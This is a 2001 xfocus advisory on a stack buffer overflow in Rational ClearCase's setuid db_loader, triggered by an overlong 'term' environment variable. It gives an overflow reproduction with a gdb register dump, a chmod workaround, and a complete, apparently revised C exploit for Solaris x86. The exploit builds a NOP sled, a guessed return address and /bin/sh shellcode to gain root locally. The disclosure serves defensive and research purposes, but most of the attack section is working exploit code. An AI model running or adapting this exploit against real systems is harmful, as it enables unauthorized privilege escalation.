ClearCase db_loader environment variable Overflow Vulnerability
Creation Time: 2001-11-10
Article Properties: Original
Article Source: http://xfocus.org
Article submitted by: Inburst (inburst_at_263.net)
----------------------------------
ClearCase db_loader environment variable Overflow vulnerability
----------------------------------
Post information
--------
Discovery Date: August 2001
Release date: November 1, 2001
Discovered by: virtualcat@xfocus.org
Website: http://xfocus.org
Simple description
--------
Rational's software configuration management tool ClearCase is used primarily in Windows and UNIX development environments. ClearCase provides comprehensive configuration management capabilities — including versioning, workspace management, build management, and process control — without requiring developers to change their existing environment, tools, or working methods.
The administrative program db_loader (/usr/atria/etc/db_loader) is installed with the setuid bit set by default. When the environment variable "term" is overly long, db_loader overflows a stack buffer while handling it; because the overwritten data includes the saved return address (see the register dump below), a local user can redirect execution and run code with the privileges of the setuid binary.
Affected Software versions and platforms
----------------------
Affected versions: ClearCase 3.2+, 4.0, 4.1, 4.2
Affected systems (as listed by the advisory): Linux, Solaris SPARC, Solaris x86, AIX, HP, Digital, IRIX, SCO, etc.
Details
----
$ term=`perl -e 'print "A" x 550'`
$ export term
$ /usr/atria/etc/db_loader
Bus Error
$ gdb db_loader core -q
(No debugging symbols found) ... Core is generated by './db_loader '.
Cannot access memory at address 0xffffffffff3e1b80
#0 0xf0db8 in Imsg_fputs ()
(GDB) bt
#0 0xf0db8 in Imsg_fputs ()
Cannot access memory at address 0x41414179
(gdb) i reg
G0 0x0 0
G1 0x7b000 503808
G2 0x13cf84 1298308
G3 0x0 0
G4 0xf6c2c 1010732
G5 0x0 0
G6 0x0 0
G7 0x143d58 1326424
O0 0xffffffff-1
O1 0x1 1
O2 0xffbef054-4263852
O3 0xf0c3c 986172
O4 0xffbeed8a-4264566
O5 0xffffffff-1
SP 0xffbeef70-4264080
O7 0xf0db0 986544
L0 0x41414141 1094795585
L1 0x41414141 1094795585
L2 0x41414141 1094795585
L3 0x41414141 1094795585
L4 0x41414141 1094795585
L5 0x41414141 1094795585
L6 0x41414141 1094795585
L7 0x41414141 1094795585
I0 0x41414141 1094795585
I1 0x41414141 1094795585
I2 0x41414141 1094795585
i3 0x41414141 1094795585
I4 0x41414141 1094795585
i5 0x41414141 1094795585
FP 0x41414141 1094795585
i7 0x41414141 1094795585
Y 0x0 0
PSR 0xfe801007-25161721 icc:n---, pil:0, s:0, ps:0, et:0, Cwp:7
Wim 0x0 0
TBR 0x0 0
PC 0XF0DB8 986552
NPC 0xf0dbc 986556
FPSR 0x0 0th:n, tem:0, ns:0, ver:0, ftt:0, qne:0, fcc:=, aexc:0, cexc:0
CPSR 0x0 0
(GDB)
A local user can exploit this to gain super-user privileges when db_loader is installed setuid root. In the trace above the saved frame pointer (FP) and return address (i7) of the SPARC register window, together with the other local/in registers, contain 0x41414141 — the 'A' bytes from the oversized variable — which shows that the overflow reaches the saved return address and therefore gives the attacker control of execution.
Test program
--------
Clearcase_x86exp.c (written for Solaris x86 7 according to its header; note that the gdb trace above comes from a SPARC system, so the offsets below are not expected to carry over unchanged)
/* Rational ClearCase term environment variable buffer overflow exploit
* Tested against Solaris x86 7 (the gdb trace in the advisory is from SPARC); bug found by virtualcat@xfocus.org
* Xploit by xundi@xfocus.org
* website:http://xfocus.org
*/
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define RET_DIS 550
#define NOP 0x90
#define NNOP 512
#define ENV_VAR "term"
#define User_upper_magic 0X08047FFF
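/*
 * Payload placed after the return-address slot and the NOP sled.
 * Taken from Pablo Sor's "mailx -f" exploit (Solaris/x86).  The original
 * listing had the escapes mangled to "/xNN", which is not C; they are "\xNN".
 * The 95 bytes contain no NUL, so the payload can live inside an environment
 * string and strlen()/sizeof-1 give its length.  The string "/bin/sh" is
 * visible at the end; what the preceding bytes do exactly is not verified
 * here (presumably privilege setup followed by execve -- confirm before use).
 */
char shellcode[] =
    "\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"
    "\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf"
    "\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff"
    "\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53"
    "\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f"
    "\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff\xff\xff\xff";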
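/*
 * Return the current stack pointer as an int.
 *
 * The exploit treats the value as a pointer into the environment area, so
 * this only makes sense on a 32-bit x86 target (Solaris x86 7 per the header).
 * The original listing left the value in %eax and fell off the end of the
 * function without a return statement (undefined behavior); an output
 * operand makes the result well defined.
 */
int Get_esp(void)
{
    int sp;

    __asm__ volatile ("mov %%esp, %0" : "=r" (sp));
    return sp;
}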
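/*
 * Scan process memory upward from the current stack pointer to the
 * Solaris/x86 user-stack ceiling (User_upper_magic) and return the address
 * of the first "NAME=" environment entry, or 0 if none is found.
 *
 * envptr: the variable name without the trailing '='.
 *
 * The address is returned as an int because the caller does 32-bit pointer
 * arithmetic on it (32-bit target assumption).  The scan reads raw memory,
 * so on any other platform it will fault rather than return.
 *
 * Fixes vs. the original listing: the comparison covered a fixed 4 bytes
 * rather than strlen(envptr), it did not require the '=' that follows a
 * real entry (so the name inside some other string matched too), and it
 * could read up to 3 bytes past the upper bound.
 */
int getenvaddr(const char *envptr)
{
    size_t namelen = strlen(envptr);
    const char *cursor = (const char *)Get_esp();

    /* name plus '=' must fit below the ceiling before we compare */
    while ((unsigned long)cursor + namelen + 1 < (unsigned long)User_upper_magic) {
        if (memcmp(cursor, envptr, namelen) == 0 && cursor[namelen] == '=') {
            return (int)cursor;
        }
        cursor++;
    }
    return 0;
}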
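/*
 * Build an oversized "term=" environment entry and exec the setuid
 * db_loader with it.
 *
 * Layout of the value: RET_DIS bytes of 'A', the guessed return address
 * (4-byte int, 32-bit target), 0-3 bytes of padding so the NOP sled is
 * word aligned, NNOP NOP bytes, the shellcode, NUL.
 *
 * argv[1] (optional): signed byte adjustment added to the guessed return
 * address when the default guess misses the NOP sled.
 *
 * The address guess assumes the exec'd process lays out its environment
 * strings at the same stack position as this process, shifted by the
 * difference in length between the current "term" value and the new one
 * (Solaris x86 7 per the header comment; this is an estimate, not a fact).
 *
 * Fixes vs. the original listing: getenv() was used unchecked (NULL -> crash
 * when "term" is not set), the buffer was several bytes too small for what
 * was written into it (the exploit overflowed its own heap block), execl()
 * failure went unreported, stdout was not flushed before exec, and the
 * "\n" in the status message was mangled.
 */
int main(int argc, char **argv)
{
    const char *current = NULL;
    char *buffptr = NULL;
    char *charptr = NULL;
    size_t shellcodelen = sizeof(shellcode) - 1; /* payload has no inner NUL */
    size_t namelen = strlen(ENV_VAR);
    size_t alloclen = 0;
    int oldlen = 0;
    int bufflen = 0;
    int retvalue = 0;
    int retaddr = 0;
    int diff = 0;
    int alignment = 0;
    int adjustment = 0;

    if (argc == 2) {
        adjustment = atoi(argv[1]);
    }

    current = getenv(ENV_VAR);
    if (current == NULL) {
        fprintf(stderr, "%s is not set in the environment; export it first\n", ENV_VAR);
        return 1;
    }

    /* Length of the existing value plus NUL, rounded up to a word. */
    oldlen = (int)strlen(current) + 1;
    if (oldlen % 4 != 0) {
        oldlen += 4 - oldlen % 4;
    }

    /* Nominal length of the new entry, rounded up to a word.  This only
     * feeds the address estimate; the real allocation is computed below. */
    bufflen = (int)(namelen + RET_DIS + NNOP + shellcodelen + 1);
    if (bufflen % 4 != 0) {
        bufflen += 4 - bufflen % 4;
    }

    /* Where the current "term=" entry sits, shifted by the growth of the
     * value, then skip the "term=" prefix to reach the start of the value. */
    retvalue = getenvaddr(ENV_VAR);
    diff = bufflen - oldlen;
    retaddr = retvalue - diff + (int)namelen + 1;
    alignment = retaddr % 4;
    if (alignment != 0) {
        alignment = 4 - alignment;
    }
    retaddr += RET_DIS + alignment + adjustment;

    /* Exact number of bytes written below:
     * "term=" + 'A's + retaddr + alignment pad + NOPs + shellcode + NUL. */
    alloclen = namelen + 1 + RET_DIS + sizeof(int) + (size_t)alignment
               + NNOP + shellcodelen + 1;
    buffptr = malloc(alloclen);
    if (buffptr == NULL) {
        printf("No more free memory!");
        return 1;
    }

    strcpy(buffptr, ENV_VAR);
    strcat(buffptr, "=");
    charptr = buffptr + strlen(buffptr);

    /* Filler, return-address slot and pad all start out as 'A'. */
    memset(charptr, 0x41, RET_DIS + sizeof(int) + (size_t)alignment);

    /* Return address at RET_DIS; memcpy avoids an unaligned int store. */
    memcpy(charptr + RET_DIS, &retaddr, sizeof(int));
    charptr += RET_DIS + sizeof(int) + alignment;

    /* Word-aligned NOP sled followed by the payload. */
    memset(charptr, NOP, NNOP);
    charptr += NNOP;
    memcpy(charptr, shellcode, shellcodelen);
    charptr += shellcodelen;
    *charptr = '\0';

    /* putenv() keeps the pointer itself, so buffptr must stay allocated. */
    putenv(buffptr);
    printf("Jumping to 0x%.8x\n", (unsigned int)retaddr);
    fflush(stdout);

    execl("/usr/atria/etc/db_loader", "Xfocus", (char *)NULL);
    /* Only reached if the exec failed. */
    perror("execl /usr/atria/etc/db_loader");
    return 1;
}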
/* Thanks to the Xfocus members, especially virtualcat. */
Temporary Solutions
------------
# chmod a-s /usr/atria/etc/db_loader
(Clearing the setuid bit stops the overflow from yielding elevated privileges until a vendor fix is available; it may prevent unprivileged users from running db_loader. Confirm with `ls -l /usr/atria/etc/db_loader` that the s bit is gone.)
Manufacturer Information
--------
The vendor was notified in August 2001.
Manufacturer Homepage: http://www.rational.com
About Xfocus
----------
Xfocus is a non-profit network and system security organization established in China in 1998 to identify and research vulnerabilities in networks, communications, software and hardware.
Copyright 2001 Http://xfocus.org, welcome reprint, but must retain the copyright information.